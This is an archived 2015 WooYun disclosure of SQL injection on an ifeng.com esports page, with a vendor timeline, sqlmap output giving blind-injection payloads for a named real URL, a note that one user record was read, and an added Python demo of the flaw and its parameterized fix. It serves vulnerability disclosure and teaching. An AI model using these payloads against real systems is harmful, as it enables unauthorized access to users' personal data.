WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-02-04: Details sent to the vendor, awaiting vendor processing
2015-02-04: Vendor confirmed the issue; details disclosed to the vendor only
2015-02-14: Details disclosed to core white hats and relevant domain experts
2015-02-24: Details disclosed to regular white hats
2015-03-06: Details disclosed to intern white hats
2015-03-21: Details disclosed to the public

SQL injection on a Phoenix New Media (ifeng.com) site #2 (mass user information disclosure)
Injection point
http://esports.games.ifeng.com/sta/setuserin/?sid=dzshd1&user=
Testing shows that the sid parameter is injectable.

sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=dzshd1' AND 8747=8747 AND 'gksS'='gksS&user=

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: sid=dzshd1' AND SLEEP(5) AND 'Jpnj'='Jpnj&user=
---
[23:48:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
The database "esports_ifeng_93" can be read.
It contains more than 100 tables, which appear to hold user records; a lot of them by the look of it... o(∩_∩)o
I enumerated the signup_userlist_1 table and read only a single row from it; no other tables or their data were touched.
Please fix this promptly. Will this one get a Rank of 20?..
Filter the input.
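As an added illustration that is not part of the original report, the snippet below shows why the sid parameter was injectable and how a parameterized query closes the hole. It uses an in-memory SQLite table as a stand-in for the MySQL backend; the table layout and rows are constructed for the example, and the payload is the boolean-based one sqlmap reported above.

```python
"""Vulnerable string-built query beside its parameterized fix.
SQLite stands in for MySQL here; table contents are constructed."""
import sqlite3

# Constructed sample data; the real schema of signup_userlist_1 is not known.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE signup_userlist_1 (sid TEXT, user TEXT)")
conn.executemany("INSERT INTO signup_userlist_1 VALUES (?, ?)",
                 [("dzshd1", "alice"), ("team42", "bob")])

# Boolean-based payload from the sqlmap output, with a false twin.
# The difference in results is the oracle sqlmap used to confirm the bug.
PAYLOAD_TRUE = "dzshd1' AND 8747=8747 AND 'gksS'='gksS"
PAYLOAD_FALSE = "dzshd1' AND 8747=8748 AND 'gksS'='gksS"


def lookup_vulnerable(sid: str) -> list:
    """Concatenates sid into the statement, so the quote in the payload
    closes the literal and the rest is parsed as SQL (the reported defect)."""
    sql = f"SELECT user FROM signup_userlist_1 WHERE sid = '{sid}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(sid: str) -> list:
    """Binds sid as a parameter: the driver passes it as a value, so quotes
    and AND/OR inside it can never change the statement's structure."""
    sql = "SELECT user FROM signup_userlist_1 WHERE sid = ?"
    return [row[0] for row in conn.execute(sql, (sid,))]


if __name__ == "__main__":
    # Injected condition is evaluated by the vulnerable path only.
    print(lookup_vulnerable(PAYLOAD_TRUE))   # ['alice']
    print(lookup_vulnerable(PAYLOAD_FALSE))  # []
    # Same payload is just an unmatched string for the parameterized path.
    print(lookup_safe(PAYLOAD_TRUE))         # []
    print(lookup_safe("dzshd1"))             # ['alice']
```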
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-02-04 10:25
Thank you very much for your help with Phoenix New Media's information security.
None yet.